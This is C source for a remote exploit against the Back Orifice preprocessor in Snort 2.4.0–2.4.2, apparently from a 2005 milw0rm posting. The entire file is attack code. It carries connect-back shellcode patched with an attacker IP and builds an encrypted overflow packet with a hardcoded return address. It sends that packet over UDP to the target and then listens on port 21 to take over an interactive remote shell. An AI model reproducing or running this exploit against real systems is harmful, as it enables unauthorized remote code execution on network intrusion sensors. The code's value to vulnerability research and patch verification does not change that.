/* * snort 2.4.0 - 2.4.2 Back Orifice Pre-Preprocessor Remote Exploit * * by Russell Sanford (xort@tty64.org) * -> www.code-junkies.net <- * * Date: Nov 11, 2005 * * Discription: A buffer overflow exist in the snort pre-preprocessor * designed to detect encrypted Back Orifice ping packets * on a network. The overflow occurs as a result of a field * size read directly from the data within that packet * inwhich an attacker can specify. * * Credit: ISS XFORCE (great work as always) * * Information: CERT TA05-291A * * Respect: Pull The Plug & DARPA Net Communities * */ #include #include #include #include #include #include #include #include #include #include #include #define buffsize 1056 #define COOKIE "*!*QWTY?" typedef struct { char magic[8]; int len; int id; char type; char data[buffsize]; char crc; } BOHEADER; char buffer[buffsize+5000]; static long holdrand = 31337L; unsigned int ret_address = 0xbfffebad; // 90 byte Connect Back shellcode. Connects Back to Port 21 to givin IP char shellcode[] = "\x31\xc0\x6a\x01\x5b\x50\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x43\x5f\x68" "\x45\xc4\x34\x1e" // IP-A "\x81\x04\x24" "\x01\x01\x01\x01" // IP-B "\x68\x01\xff\xfe\x13\x81\x04\x24\x01\x01\x01\x01\x6a\x10\x51\x50\x89\xe1\xb0" "\x66\xcd\x80\x5b\x31\xc9\x6a\x3f\x58\xcd\x80\x41\x80\xf9\x03\x75\xf5\x31\xc0" "\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0" "\x0b\xcd\x80\xeb\xfe"; int mrand (void) { return(((holdrand = holdrand * 214013L + 2531011L) >> 16) & 0x7fff); } void timeout(int sig_num) { printf(" [-] Listen() for connect back shellcode timed out. Exploit Failed!\n"); exit(1); } int main(int argc, char **argv) { signal(SIGALRM,timeout); int s, z, i, len_inet, IP_a, IP_b, l, sent; char *server_addr=argv[1]; char *local_addr=argv[2]; char buf[512]; struct sockaddr_in adr_srvr, adr, loc_adr; fd_set rfds, wfds; printf("\n\t,------------------------------------------------------------,\n" "\t| Snort 2.4.0-2.4.2 Back Orifice Preprocessor Remote Exploit |\n" "\t| by Russell Sanford - xort@tty64.org |\n" "\t`------------------------------------------------------------`\n\n"); /* * Check for Valid Input */ if (argc < 3) { printf("usage: ./snortxp TARGET-IP CONNECT-BACK-IP\n\n"); exit(1); } /* * Fix up Safe Values for connect back shellcode */ IP_a = inet_addr(argv[2]); IP_b = 0; printf(" [x] Patching Shellcode to Connect back to %s.\n",argv[2]); do { IP_a -= 0x01010101; IP_b += 0x01010101; } while ( ((IP_a & 0x000000ff) == 0) || ((IP_a & 0x0000ff00) == 0) || ((IP_a & 0x00ff0000) == 0) || ((IP_a & 0xff000000) == 0) ); *(int *)&shellcode[19] = IP_a; *(int *)&shellcode[26] = IP_b; /* * Create And Fill In Header Info */ printf(" [x] Creating Evil Packet.\n"); BOHEADER evil_packet; memcpy(evil_packet.magic,COOKIE,8); evil_packet.len = (buffsize+38); //1094 evil_packet.id = 0xbadc0ded; memset(evil_packet.data, 0x90, buffsize); memcpy(&evil_packet.data[buffsize-300],shellcode,90); evil_packet.type = 0x1; evil_packet.crc = 0x43; printf(" [x] Using Return Address: 0x%.8x.\n",ret_address); *(int *)&evil_packet.data[buffsize-4] = ret_address; /* * Encrypt Evil Packet */ printf(" [x] Encrypting Packet.\n"); memcpy(buffer,&evil_packet,(18+buffsize)); for(i=0; i < (18+buffsize); i++) { buffer[i] = buffer[i] ^ (mrand()%256); } /* * Set Up Socket To Send UDP Packet */ printf(" [x] Preparing to Send Evil UDP Packet to %s.\n",argv[1]); memset(&adr_srvr,0,sizeof adr_srvr); adr_srvr.sin_family = AF_INET; adr_srvr.sin_port = htons(9000); adr_srvr.sin_addr.s_addr = inet_addr(server_addr); len_inet = sizeof adr_srvr; s = socket(AF_INET,SOCK_DGRAM,0); if ( s == -1 ) { printf(" [-] Failed to Create Socket. Exiting...\n"); exit(1); } /* * Send Packet */ printf(" [x] Sending Packet.\n"); z = sendto(s,buffer,(18+buffsize),0,(struct sockaddr *)&adr_srvr, len_inet); if ( z == -1 ) { printf(" [-] Failed to Send Packet. Exiting...\n"); exit(1); } /* * Listen For Connect Back Shellcode */ printf(" [x] Listening for Connect Back Shellcode.\n"); s = socket(AF_INET,SOCK_STREAM,0); if ( s == -1 ) { printf(" [-] Failed to Create Socket. Exiting...\n"); exit(1); } memset(&adr,0,sizeof adr); adr.sin_family = AF_INET; adr.sin_port = htons(21); adr.sin_addr.s_addr = INADDR_ANY; z = bind(s,(struct sockaddr *)&adr,sizeof(struct sockaddr)); if ( z == -1 ) { printf(" [-] Failed to Bind Socket. Exiting...\n"); exit(1); } alarm(30); // Set alarm so code can time out listen(s,4); int sin_size = sizeof(struct sockaddr_in); int new_fd = accept(s, (struct sockaddr *)&loc_adr,&sin_size); alarm(0); if (new_fd == -1 ) { printf(" [-] Failed to Accept Connection. Exiting...\n"); exit(1); } printf(" [x] Connection Established! Exploit Successful.\n\n"); write(new_fd,"uname -a\nid\n",12); /* * Establish Connection. (ripped) */ while (1) { FD_SET (0, &rfds); FD_SET (new_fd, &rfds); FD_SET (new_fd, &wfds); select (new_fd + 1, &rfds, NULL, NULL, NULL); if (FD_ISSET (0, &rfds)) { l = read (0, buf, sizeof (buf)); if (l <= 0) { exit (EXIT_FAILURE); } sent=0; while (!sent) { select (new_fd+1, NULL, &wfds, NULL, NULL); if (FD_ISSET(new_fd, &wfds)) { write(new_fd, buf, l); sent=1; } } } if (FD_ISSET (new_fd, &rfds)) { l = read (new_fd, buf, sizeof (buf)); if (l == 0) { fprintf(stdout,"\n [x] Connection Closed By Remote Host.\n"); exit (EXIT_FAILURE); } else if (l < 0) { exit (EXIT_FAILURE); } write (1, buf, l); } } return 0; } // milw0rm.com [2005-11-11]